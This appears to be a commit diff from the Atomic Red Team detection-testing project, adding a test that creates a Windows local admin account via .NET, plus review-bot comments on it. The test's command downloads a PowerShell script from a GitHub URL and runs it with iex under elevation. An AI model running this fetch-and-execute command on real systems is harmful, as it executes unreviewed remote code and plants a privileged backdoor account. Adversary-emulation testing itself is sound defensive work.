Generated docs from job=generate-docs branch=master [ci skip]

Atomic Red Team doc generator
2023-11-17 17:46:05 +00:00
parent 5a9d3290f2
commit 04a5812d41
9 changed files with 60 additions and 2 deletions
@@ -1026,6 +1026,7 @@ persistence,T1136.001,Create Account: Local Account,5,Create a new user in Power
persistence,T1136.001,Create Account: Local Account,6,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash
persistence,T1136.001,Create Account: Local Account,7,Create a new user in FreeBSD with `root` GID.,d141afeb-d2bc-4934-8dd5-b7dba0f9f67a,sh
persistence,T1136.001,Create Account: Local Account,8,Create a new Windows admin user,fda74566-a604-4581-a4cc-fbbe21d66559,command_prompt
persistence,T1136.001,Create Account: Local Account,9,Create a new Windows admin user via .NET,2170d9b5-bacd-4819-a952-da76dae0815f,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
@@ -668,6 +668,7 @@ persistence,T1547.003,Time Providers,2,Edit an existing time provider,29e0afca-8
persistence,T1136.001,Create Account: Local Account,4,Create a new user in a command prompt,6657864e-0323-4206-9344-ac9cd7265a4f,command_prompt
persistence,T1136.001,Create Account: Local Account,5,Create a new user in PowerShell,bc8be0ac-475c-4fbf-9b1d-9fffd77afbde,powershell
persistence,T1136.001,Create Account: Local Account,8,Create a new Windows admin user,fda74566-a604-4581-a4cc-fbbe21d66559,command_prompt
persistence,T1136.001,Create Account: Local Account,9,Create a new Windows admin user via .NET,2170d9b5-bacd-4819-a952-da76dae0815f,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
@@ -1533,6 +1533,7 @@
- Atomic Test #6: Create a new user in Linux with `root` UID and GID. [linux]
- Atomic Test #7: Create a new user in FreeBSD with `root` GID. [linux]
- Atomic Test #8: Create a new Windows admin user [windows]
- Atomic Test #9: Create a new Windows admin user via .NET [windows]
- T1053.001 At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1179 Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.011 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1036,6 +1036,7 @@
- Atomic Test #4: Create a new user in a command prompt [windows]
- Atomic Test #5: Create a new user in PowerShell [windows]
- Atomic Test #8: Create a new Windows admin user [windows]
- Atomic Test #9: Create a new Windows admin user via .NET [windows]
- T1179 Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md)
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
@@ -66610,6 +66610,18 @@ persistence:
'
name: command_prompt
elevation_required: true
- name: Create a new Windows admin user via .NET
auto_generated_guid: 2170d9b5-bacd-4819-a952-da76dae0815f
description: 'Creates a new admin user in a powershell session without using
net.exe
'
supported_platforms:
- windows
executor:
command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/0xv1n/dotnetfun/9b3b0d11d1c156909c0b1823cff3004f80b89b1f/Persistence/CreateNewLocalAdmin_ART.ps1')
name: powershell
elevation_required: true
T1053.001:
technique:
x_mitre_platforms:
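Review bot: The `command:` line of the new `executor` block fetches the test body from a personal repository with `downloadstring` and passes it to `iex`, so the account name, password and group membership the test sets are not visible in this change and cannot be reviewed here. Pinning the URL to a full commit hash keeps the fetched content fixed, which is good, but the test still fails on hosts without outbound access to raw.githubusercontent.com, and the download itself produces network and script-execution telemetry unrelated to T1136.001, which muddies detection validation for account creation. Consider vendoring the script next to the technique's other files and invoking it from a local path so the test content is reviewable in-tree.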
@@ -56194,6 +56194,18 @@ persistence:
'
name: command_prompt
elevation_required: true
- name: Create a new Windows admin user via .NET
auto_generated_guid: 2170d9b5-bacd-4819-a952-da76dae0815f
description: 'Creates a new admin user in a powershell session without using
net.exe
'
supported_platforms:
- windows
executor:
command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/0xv1n/dotnetfun/9b3b0d11d1c156909c0b1823cff3004f80b89b1f/Persistence/CreateNewLocalAdmin_ART.ps1')
name: powershell
elevation_required: true
T1053.001:
technique:
x_mitre_platforms:
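Review bot: The new entry ends at `elevation_required: true` with no `cleanup_command`, so the admin account this test creates stays on the host after the run. Add a cleanup step that removes the account, and expose its name through `input_arguments` so the cleanup and any detection rule can reference the same value. Because this file is generated (the commit message says `job=generate-docs`), the fix belongs in the source definition for T1136.001 rather than in this index.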
@@ -24,6 +24,8 @@ Such accounts may be used to establish secondary credentialed access that do not
- [Atomic Test #8 - Create a new Windows admin user](#atomic-test-8---create-a-new-windows-admin-user)
- [Atomic Test #9 - Create a new Windows admin user via .NET](#atomic-test-9---create-a-new-windows-admin-user-via-net)
<br/>
@@ -335,4 +337,32 @@ net user /del "#{username}" >nul 2>&1
<br/>
<br/>
## Atomic Test #9 - Create a new Windows admin user via .NET
Creates a new admin user in a powershell session without using net.exe
**Supported Platforms:** Windows
**auto_generated_guid:** 2170d9b5-bacd-4819-a952-da76dae0815f
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/0xv1n/dotnetfun/9b3b0d11d1c156909c0b1823cff3004f80b89b1f/Persistence/CreateNewLocalAdmin_ART.ps1')
```
<br/>
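Review bot: The description under the `## Atomic Test #9` heading says only that the user is created "without using net.exe"; it does not name the account, the group it is added to, or the .NET API involved, which is what someone validating detections needs in order to know what telemetry to expect. Expand the description with those details, and write `PowerShell` with its usual capitalisation to match the test names elsewhere in the index.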